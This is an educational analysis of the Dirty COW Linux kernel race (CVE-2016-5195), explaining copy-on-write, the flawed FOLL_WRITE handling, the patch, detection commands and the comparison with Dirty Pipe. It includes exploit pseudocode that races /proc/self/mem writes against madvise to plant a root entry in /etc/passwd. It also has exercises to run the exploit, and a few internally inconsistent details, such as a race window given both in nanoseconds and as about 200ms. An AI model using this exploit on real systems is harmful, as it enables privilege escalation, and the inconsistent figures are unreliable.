03 — Dirty COW Analysis (CVE-2016-5195)

Technical Overview

Dirty COW (CVE-2016-5195) is a race condition in the Linux kernel's memory management subsystem that allowed an unprivileged user to modify any read-only file on the system — including /etc/passwd, SUID binaries, and kernel mappings — without write permission. The vulnerability existed in the kernel for approximately 9 years (introduced in Linux 2.6.22, released July 2007) before being discovered and disclosed in October 2016.

The name derives from the mechanism: dirty copy-on-write. The bug allowed the write to contaminate the original file by racing the copy-on-write protection away before the write completed.

CVSS score: 7.8 HIGH (local, no interaction, high impact on confidentiality/integrity/availability).

Prerequisites

Linux virtual memory: mmap, anonymous vs file-backed mappings
Copy-on-write semantics in Linux VM
/proc/self/mem (kernel mechanism for self-debugging)
madvise() system call (memory advice hints)
Basics of memory-mapped file I/O

Background: Copy-on-Write in Linux

Copy-on-write (CoW) is a memory optimization for fork(). When a process forks, the child inherits the parent's page tables but no pages are physically copied — both parent and child share the same physical pages, marked read-only in both page tables.

When either process writes to a shared page, the MMU detects a write to a read-only page and raises a page fault (specifically a write protection fault or COW fault). The kernel's page fault handler:

Detects this is a COW fault (page is shared, write to CoW page)
Allocates a new physical page
Copies the original page's content to the new page
Updates the faulting process's page table entry to point to the new (private) copy with write permission
Returns, allowing the write to proceed to the private copy

The original physical page is unmodified. Both the parent and child now have private copies.

Before write fault:
  Parent PTE: phys_page_A → read-only
  Child  PTE: phys_page_A → read-only (same physical page)
  Physical:   phys_page_A (original content)

After CoW fault (child writes):
  Parent PTE: phys_page_A → read-only (unchanged)
  Child  PTE: phys_page_B → read-write (new private copy)
  Physical A: original content (unchanged)
  Physical B: copy of A, with child's write applied

For read-only file mappings: When a process maps a read-only file (mmap(file, PROT_READ)) and then tries to write to it with PROT_WRITE | MAP_PRIVATE, the same CoW mechanism applies. The write should go to a private copy in the process's address space and never reach the underlying file.

The Vulnerable Code Path

The vulnerability lives in mm/memory.c, specifically in the interaction between three operations:

write() to /proc/self/mem (which can write to any address in the current process)
madvise(MADV_DONTNEED) on a mapped region (discards the private copy, forcing next access to re-fault)
The kernel's get_user_pages() function which pins pages for direct access

The normal flow for writing to a read-only mapping via /proc/self/mem:

write(proc_mem_fd, data, size, offset=mapped_ro_file_addr)
    │
    ▼
mem_write() in fs/proc/task_mmu.c
    │
    ▼
access_remote_vm() → get_user_pages()
    │
    ├── Walks page table for the address
    ├── Finds page is read-only (CoW protection)
    ├── Triggers software CoW: allocates new private copy
    └── Returns pointer to the NEW private copy
    │
    ▼
copy_to_user_page() — writes data to the private copy
    │
    ▼
RESULT: data written to private copy, ORIGINAL FILE UNCHANGED

This is the intended behavior: writing via /proc/self/mem to a read-only mmap'd address creates and writes to a private copy, never touching the original file.

The Race Condition: How Dirty COW Works

The bug: get_user_pages() was not atomic with the subsequent write. An attacker can race madvise(MADV_DONTNEED) against the get_user_pages() call to discard the private copy before copy_to_user_page() runs, causing the write to fall through to the original file.

Race window timing diagram:

Thread 1 (Writer): write() to /proc/self/mem
Thread 2 (Madvise): madvise(MADV_DONTNEED) in a tight loop

   Thread 1                          Thread 2
       │                                 │
  write(proc_fd, data, ...)             │
       │                          madvise(addr, MADV_DONTNEED)
       ▼                                 │
  get_user_pages()                       │
  ├── Walk page table                    │
  ├── Find CoW page                      │
  ├── Allocate PRIVATE copy ←━━━━━━━━━━━━┥ RACE WINDOW OPENS
  │   (private copy now exists)          │
  │                                      ▼
  │                            madvise(MADV_DONTNEED)
  │                            DISCARDS PRIVATE COPY
  │                            Page reverts to original file mapping
  │                            RACE WINDOW CLOSES
  ▼
  copy_to_user_page() writes to the page at the address
  BUT the private copy was discarded!
  The page is now the original file page!
  → WRITE GOES TO ORIGINAL FILE

  Result: read-only file has been modified

Key insight: MADV_DONTNEED discards the private CoW copy and makes the mapping revert to the underlying file page. If this happens between get_user_pages() returning the CoW page and copy_to_user_page() writing to it, the write target has changed — but the write proceeds to wherever the physical page is, which is now the original file's page.

The race window is narrow (a few hundred nanoseconds) but not impossibly so, especially with Hyper-Threading available. Thread 1 and Thread 2 can run on sibling logical CPUs sharing the same physical core, making them genuinely concurrent.

Technical Deep Dive: get_user_pages() Flaw

The core issue was in faultin_page() (called by get_user_pages()):

/* VULNERABLE CODE (simplified, pre-patch) */
static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
                        unsigned long address, unsigned int *flags, int *nonblocking)
{
    unsigned int fault_flags = 0;

    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;

    /* Trigger CoW fault: allocates private copy */
    ret = handle_mm_fault(mm, vma, address, fault_flags);
    if (ret & VM_FAULT_WRITE) {
        /* CoW happened: private copy allocated */
        /* PROBLEM: between here and the actual write, MADV_DONTNEED
           can discard the private copy */
        *flags &= ~FOLL_WRITE;  /* WRONG: clears write requirement
                                    allowing retry without CoW */
    }
    return 0;
}

The bug is *flags &= ~FOLL_WRITE after a successful CoW: this flag controls whether subsequent retries of get_user_pages() will require write access. By clearing it, if the loop retries after MADV_DONTNEED discards the private copy, the retry gets the original read-only page WITHOUT performing CoW again — and then the write proceeds directly to the original file page.

Exploitation: Modifying /etc/passwd

The most common exploitation method:

/* Classic Dirty COW exploit pseudocode */

int f = open("/etc/passwd", O_RDONLY);
struct stat st;
fstat(f, &st);

/* Map /etc/passwd read-only */
char *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);

/* Thread 1: write "root" entry with no password */
void *write_thread(void *arg) {
    int proc_fd = open("/proc/self/mem", O_RDWR);
    while (!stop) {
        /* Write backdoor root entry over first line */
        lseek(proc_fd, (off_t)map, SEEK_SET);
        write(proc_fd, backdoor_entry, strlen(backdoor_entry));
    }
}

/* Thread 2: MADV_DONTNEED in a loop */
void *madvise_thread(void *arg) {
    while (!stop) {
        madvise(map, st.st_size, MADV_DONTNEED);
    }
}

/* Start both threads, run for ~200ms */
/* Check: did /etc/passwd get modified? */
/* If not, try again */

After successful exploitation, /etc/passwd contains a new root entry (or modified root entry with no password hash). The attacker then runs su with no password to gain root.

Android exploitation: The same technique was used to overwrite a SUID binary (e.g., /system/bin/run-as or /system/xbin/su) with a backdoored version. On Android, this was particularly effective because: - Android apps run as isolated UIDs but can access /proc/self/mem - /system is typically read-only (mounted read-only) but file permissions say readable by apps - Successful overwrite of run-as gave a persistent root shell

Exploitation Timeline

  2007-07-08: Linux 2.6.22 released — bug introduced
  |           (approximately — exact introduction commit is
  |           controversial; the bug's root is older)
  |
  |           9 YEARS of silent presence in every Linux system
  |           deployed globally
  |
  2016-10-19: Phil Oester publicly discloses CVE-2016-5195
              Discovery: found in the wild via analysis of
              HTTP server exploit file uploads
              "I have been running a honeypot and captured
              this exploit being used" — Phil Oester
  |
  2016-10-20: Linus Torvalds commits patch
              ("This is an ancient bug...")
  |
  2016-10-26: Linux 4.8.3, 4.7.9, 4.4.26 released with fix
  |
  2016-11:    Android security bulletin includes patches for
              all supported Android versions
  |
  2016-2017:  Dirty COW used in:
              - Android device rooting tools (mass deployment)
              - Targeted attacks against Linux web servers
              - Container escapes (early, before seccomp blocking)

Phil Oester, the discoverer, found it not by code review but by finding an exploit binary uploaded to his honeypot server that used Dirty COW to gain root. The bug had been in production for 9 years before real-world exploitation was observed.

Linus Torvalds' commit message: "This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ('Fix get_user_pages() race for write access') but that was then undone due to problems on s390 by commit f33ea7f404e5 ('fix get_user_pages bug') by Hugh Dickins in 2011."

The original fix attempt was from 2005, making the underlying issue acknowledged for 11 years before the correct fix was applied.

The Patch

The fix replaced the racy get_user_pages() approach with an atomic "retry with write" mechanism:

/* PATCHED approach (simplified) */
static int faultin_page(...)
{
    if (*flags & FOLL_WRITE)
        fault_flags |= FAULT_FLAG_WRITE;

    ret = handle_mm_fault(mm, vma, address, fault_flags);

    /* KEY CHANGE: do NOT clear FOLL_WRITE after CoW */
    /* The retry loop will re-check page writability each time */
    /* If MADV_DONTNEED discards the copy, retry will redo CoW */

    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags |= FOLL_COW;  /* mark that we already did CoW */

    return 0;
}

The critical change: stop clearing FOLL_WRITE after CoW. If the private copy is discarded between iterations of get_user_pages()'s retry loop, the next iteration will require write access again, trigger a new CoW, and get a fresh private copy. The window for the race is eliminated because every retry re-performs CoW before writing.

Impact Assessment

Affected systems: Every Linux system running kernel 2.6.22 through 4.8.2. This includes: - All major Linux distributions (Ubuntu, Debian, RHEL, CentOS, Fedora, openSUSE) - Android 1.0 through 7.1 (approximately) - Embedded Linux systems, routers, IoT devices (many never patched) - Container hosts where containers run with host kernel

Exploitability: Very high. The race is reliable with a ~200ms window. Successful exploitation rate approaches 100% on single-threaded kernels or kernels with Hyper-Threading enabled. Even on non-HT systems, the race is winnable with patient iteration.

Actual exploitation in the wild: Documented in: - Android rooting tools ("DirtyCOW root exploit for Android 5/6/7") — distributed via app stores and rooting forums - Linux privilege escalation in CTF competitions (reliable, fast) - Targeted attacks against cloud Linux instances (documented by Red Hat security team)

Lessons: Why Race Condition Bugs Are Long-Lived

Dirty COW illustrates why race conditions are among the hardest bugs to detect and fix:

No static analyzer can detect it: The flaw requires reasoning about two concurrent code paths, their relative timing, and the state change from MADV_DONTNEED. No compiler warning, no -fsanitize flag catches it.
Normal execution appears correct: Running the vulnerable code path once, with no concurrent madvise, works perfectly. Unit tests pass. System tests pass. Only under specific race conditions does the bug manifest.
Temporal distance between components: The bug involves mm/memory.c (CoW handling), mm/madvise.c (MADV_DONTNEED), and fs/proc/task_mem.c (/proc/self/mem write). The interaction between three separate subsystems is not apparent in code review of any single file.
Previous fix was incomplete: Linus's 2005 fix attempted to solve the same problem but was reverted due to s390 compatibility issues. The correct fix required understanding why the original fix broke s390.
ThreadSanitizer doesn't work on kernel code: The standard race detection tools (TSan for userspace, KCSAN for kernel) were not in widespread use. KCSAN (Kernel Concurrency Sanitizer) was merged in Linux 5.8 (2020) — four years after Dirty COW was found.

Variant Analysis: Dirty Pipe (CVE-2022-0847)

For comparison, Dirty Pipe is a 2022 vulnerability by Max Kellermann with similar impact (write to read-only files) but different mechanism:

Class: Logic error (uninitialized flag) in pipe splice code, not a race condition
Mechanism: PIPE_BUF_FLAG_CAN_MERGE flag was not cleared when a pipe page was initialized from a file splice. Subsequent writes to the pipe could "merge" into the spliced page, writing to the original file.
No race required: Dirty Pipe is deterministic, fully reliable, single-threaded
Impact: Same as Dirty COW — write to any file readable by the process
Kernel versions: 5.8 (when splice merge was added) through 5.16.10

Both bugs allow writing to arbitrary read-only files but Dirty Pipe is simpler to exploit reliably.

Debugging Notes

# Check if kernel is vulnerable
uname -r
# Vulnerable: < 4.8.3, < 4.7.9, < 4.4.26

# Check KCSAN (Kernel Concurrency Sanitizer) status
grep CONFIG_KCSAN /boot/config-$(uname -r)

# Monitor for Dirty COW exploitation attempts
# Pattern: rapid madvise + proc/mem writes from same process
inotifywait -m /etc/passwd &
# Then watch for writes

# Audit approach
auditctl -w /etc/passwd -p w -k passwd_write

# Post-exploitation detection: /etc/passwd modification time
stat /etc/passwd

Security Implications

Dirty COW demonstrates the risk of: - Complex multi-threaded kernel code paths: The interaction of multiple syscalls in concurrent scenarios creates emergent vulnerabilities - Read-only memory is not immutable: If a kernel bug allows bypassing the write protection, "read-only" files can be silently modified - Privileged processes (SUID binaries): Modifying a SUID binary is equivalent to gaining root; any readable SUID binary is a target - Containers: Despite container isolation, all containers share the host kernel — a Dirty COW exploit inside a container escapes it because it modifies host filesystem pages

Performance Implications

The fix adds a retry loop in get_user_pages() but this path is not on the hot path for normal memory access. The performance impact of the patch is negligible in production benchmarks.

KCSAN (merged to detect this class of bug in the future) has 10-30% performance overhead and is only enabled in debug kernels, not production.

Failure Modes

Exploit race not won: The two threads iterate for the window duration without winning. On heavily loaded systems, the scheduler may not interleave them appropriately. Solution: increase thread priority via nice(-20, ...) or use real-time scheduling.

Kernel oops: If the race is won in a way that corrupts kernel data structures rather than cleanly writing to the file page, the kernel may oops. Rare but observed in buggy exploit implementations.

Partial write: Only part of the modification was written before the race window closed. /etc/passwd may be partially corrupted. Solution: check file integrity before proceeding.

Modern Usage

Dirty COW is patched on any modern Linux kernel. Its continued relevance is:

Unpatched IoT/embedded devices: Millions of embedded Linux systems running 2.6.x-4.x kernels will never be updated. Dirty COW is reliably exploitable on any such device that can be accessed.
Educational value: Dirty COW is the canonical race condition kernel exploit used in security education, CTF challenges, and exploit development training because it is approachable, well-documented, and historically important.
Variant hunting: Understanding Dirty COW's mechanism motivates looking for similar races in other VM interactions. CVE-2019-14489, CVE-2020-29374 (GUP variants) are directly inspired by Dirty COW analysis.

Future Directions

KCSAN deployment in CI/CD: Google's kernel fuzzing infrastructure (syzkaller + KCSAN) now runs continuously against the Linux kernel mainline, catching new race conditions before they reach stable kernels. KCSAN instruments every memory access with a lightweight "data race detector" — if two CPUs access the same memory location concurrently without proper synchronization, KCSAN reports it.

Memory safety for CoW paths: A Rust rewrite of the CoW page fault handler would enforce that the lifetime of the CoW page is correctly managed before the write proceeds — the type of ownership error that enabled Dirty COW cannot occur in safe Rust.

Exercises

Set up a Linux VM running kernel 4.4.x (Ubuntu 16.04 is a good choice). Run the Dirty COW exploit against /etc/passwd. Verify exploitation. Patch the kernel and confirm the exploit fails.
Read Linus's 2005 commit (4ceb5db9757a) and Hugh Dickins's revert (f33ea7f404e5). Understand why the 2005 fix broke s390. Write a one-page explanation.
Implement a minimal Dirty COW PoC that writes a single byte to a read-only file. Measure the average time-to-win the race across 100 runs on your test system.
Compare CVE-2016-5195 (Dirty COW) and CVE-2022-0847 (Dirty Pipe): both write to read-only files. Write a comparison table of mechanism, reliability, kernel version range, and mitigation.
Use KCSAN on a test kernel: enable CONFIG_KCSAN=y, write a kernel module that deliberately has a data race, and capture the KCSAN report. Understand what a KCSAN report looks like.

References

CVE-2016-5195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
Phil Oester's disclosure: https://dirtycow.ninja/
Linus Torvalds' fix commit: b1de0d13e49c ("mm: remove gup_flags FOLL_WRITE games from __get_user_pages()")
Dirty COW website: https://dirtycow.ninja (historical)
CVE-2022-0847 (Dirty Pipe) analysis: https://dirtypipe.cm4all.com/
KCSAN paper: "KCSAN: Finding races in the Linux kernel" — Marco Elver, Google, 2020
Android DirtyCow analysis: Project Zero blog
mm/memory.c — Linux kernel CoW implementation
Linux kernel git: git log --all --oneline | grep -i "cow\|get_user_pages\|foll_write"